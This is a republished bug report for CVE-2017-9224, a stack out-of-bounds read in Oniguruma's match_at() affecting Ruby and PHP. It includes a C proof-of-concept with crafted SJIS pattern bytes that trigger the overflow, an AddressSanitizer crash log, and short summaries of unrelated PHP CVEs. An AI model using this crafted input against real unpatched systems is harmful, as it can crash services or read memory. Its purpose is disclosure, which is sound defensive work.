Headline
CVE-2017-9224: Buffer Overflow in match_at() · Issue #57 · kkos/oniguruma
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
The buffer-overflow is found with the code:
#include <stdio.h> #include “oniguruma.h”
static int search(regex_t* reg, unsigned char* str, unsigned char* end) { int r; unsigned char *start, *range; OnigRegion *region;
region = onig_region_new();
start = str; range = end; r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE); if (r >= 0) { int i;
fprintf(stderr, "match at %d (%s)\\n", r,
ONIGENC\_NAME(onig\_get\_encoding(reg)));
for (i = 0; i < region->num\_regs; i++) {
fprintf(stderr, "%d: (%d\-%d)\\n", i, region->beg\[i\], region->end\[i\]);
}
} else if (r == ONIG_MISMATCH) { fprintf(stderr, "search fail (%s)\n", ONIGENC_NAME(onig_get_encoding(reg))); } else { /* error */ char s[ONIG_MAX_ERROR_MESSAGE_LEN]; onig_error_code_to_str(s, r); fprintf(stderr, "ERROR: %s\n", s); fprintf(stderr, " (%s)\n", ONIGENC_NAME(onig_get_encoding(reg))); return -1; }
onig_region_free(region, 1 /* 1:free self, 0:free contents only */); return 0; } static int exec(OnigEncoding enc, OnigOptionType options, char* apattern, char* apttern_end, char* astr, char* end) { int r; regex_t* reg; OnigErrorInfo einfo; UChar* pattern = (UChar* )apattern; UChar* str = (UChar* )astr;
onig_initialize(&enc, 1);
r = onig_new(®, pattern, apttern_end, options, enc, ONIG_SYNTAX_DEFAULT, &einfo); if (r != ONIG_NORMAL) { char s[ONIG_MAX_ERROR_MESSAGE_LEN]; onig_error_code_to_str(s, r, &einfo); fprintf(stderr, "ERROR: %s\n", s); return -1; }
r = search(reg, str, end);
onig_free(reg); onig_end(); return 0; } int main() { regex_t *reg; unsigned char str[] = { 0xc7, 0xd6, 0xfe, 0xea, 0xe0, 0xe2, 0x00 }; unsigned char input[] = {0xf1, 0x5c, 0x69, 0x53, 0x53, 0x53, 0x53, 0x3c, 0x30, 0x53, 0x59, 0x54, 0x52, 0x33, 0x7c, 0x2e, 0x5c, 0xe2, 0x48, 0x5c, 0x7a, 0x53, 0x00, 0x06, 0x00, 0x00, 0x27, 0x19, 0x00, 0x54, 0x52, 0x54, 0x52, 0x33, 0x7c, 0x2e, 0x53, 0xe2, 0x48}; int r = exec( ONIG_ENCODING_SJIS ,ONIG_OPTION_IGNORECASE , (char*)input,input+39, (char*) str,str+7 ); return 0; }
The asan err can be found as follows:
==4064==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdd18d5447 at pc 0x00000044434c bp 0x7ffdd18d4910 sp 0x7ffdd18d4900
READ of size 1 at 0x7ffdd18d5447 thread T0
#0 0x44434b in match_at /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:1481
#1 0x457fdf in onig_search /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:3651
#2 0x401148 in search /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:18
#3 0x401786 in exec /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:65
#4 0x401a02 in main /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:77
#5 0x7f9bd023582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#6 0x400f68 in _start (/home/xie/Downloads/oni/oni-asan-dev/test/testc+0x400f68)
Address 0x7ffdd18d5447 is located in stack of thread T0 at offset 39 in frame
#0 0x40186f in main /home/xie/Downloads/oni/oni-asan-dev/test/testc.c:71
This frame has 2 object(s):
[32, 39) 'str' <== Memory access at offset 39 overflows this variable
[96, 135) 'input'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/xie/Downloads/oni/oni-asan-dev/src/regexec.c:1481 match_at
Shadow bytes around the buggy address:
0x10003a312a30: 00 00 00 00 00 00 00 00 00 00 00 02 f3 f3 f3 f3
0x10003a312a40: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10003a312a50: 00 00 00 00 f1 f1 f1 f1 00 f4 f4 f4 f2 f2 f2 f2
0x10003a312a60: 00 00 00 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 00
0x10003a312a70: 00 00 00 02 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
=>0x10003a312a80: 00 00 00 00 f1 f1 f1 f1[07]f4 f4 f4 f2 f2 f2 f2
0x10003a312a90: 00 00 00 00 07 f4 f4 f4 f3 f3 f3 f3 00 00 00 00
0x10003a312aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003a312ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003a312ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10003a312ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==4064==ABORTING
Related news
spl_array.c in the SPL extension in PHP before 5.5.37 and 5.6.x before 5.6.23 improperly interacts with the unserialize implementation and garbage collection, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and application crash) via crafted serialized data.
The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.
The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file.